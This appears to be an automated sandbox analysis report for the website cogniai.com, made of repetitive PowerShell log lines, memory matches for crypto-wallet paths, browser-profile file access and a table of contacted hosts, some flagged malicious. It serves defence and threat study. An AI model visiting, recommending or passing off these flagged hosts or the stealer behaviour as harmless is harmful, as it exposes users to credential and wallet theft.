Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4111.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-US~10.0.22621.3958.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformation	Jump to behavior

Source: Yara match	File source: 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1636324703.0000020D26D62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0xBKHFISYHPX.exe PID: 3844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hueta.exe PID: 4916, type: MEMORYSTR

Source: cmd.exe, 0000001D.00000003.1863337138.00000226096D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wallets\Electrum
Source: cmd.exe, 0000001D.00000003.1863337138.00000226096D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wallets\Exodus\exodus.wallet
Source: cmd.exe, 0000001D.00000003.1863337138.00000226096D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wallets\Exodus\exodus.wallet
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1937025690.0000020DC8FEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum (USDT ERC-20)
Source: chrome.exe, 00000000.00000002.1949807943.0000016682202000.00000004.00000001.00040000.00000010.sdmp	String found in binary or memory: ProtoDB.LoadEntriesSuccess.GCMKeyStore

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7lm9kv4h.default	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\aqo0o2a7.default-release	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
74.208.236.215	cogniai.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	false
172.67.139.119	ka-f.fontawesome.com.cdn.cloudflare.net	United States	13335	CLOUDFLARENETUS	false
91.200.14.69	unknown	Ukraine	25385	BELCOMUA-ASUA	true
104.21.80.1	analytiscnode.com	United States	13335	CLOUDFLARENETUS	false
104.21.68.46	analytiwave.com	United States	13335	CLOUDFLARENETUS	false
172.67.132.245	security.flaweguaard.com	United States	13335	CLOUDFLARENETUS	false
172.67.148.228	kolepti.com	United States	13335	CLOUDFLARENETUS	true
74.125.137.105	www.google.com	United States	15169	GOOGLEUS	false
172.67.186.167	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.101.94	beacons-handoff.gcp.gvt2.com	United States	15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
172.67.149.12	d-nodes.shop	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Windows Analysis Report HTTPS://cogniai.com

General Information

Detection

Signatures

Classification

Signatures

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
HTTPS://cogniai.com

Name	Malicious	Reputation
https://cogniai.com/	false	unknown
http://c.pki.goog/r/r4.crl	false	high
http://c.pki.goog/r/r1.crl	false	high
https://d-nodes.shop/143033599042554?dtix0r5t=v9yU1KMas6TTLJXsHXxM%2B5Le4pejRZ8FoYSix9DoKZlSzGJQn0n1ycmUZFXxLyr2	false	unknown
https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n	true	unknown
https://cogniai.com/?verified=true	false	unknown

ID:	1701089
Product:	CloudBasic
Start time:	23:03:20
Start date:	28.05.2025
Cookbook:	browseurl.jbs
System description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Architecture:	WINDOWS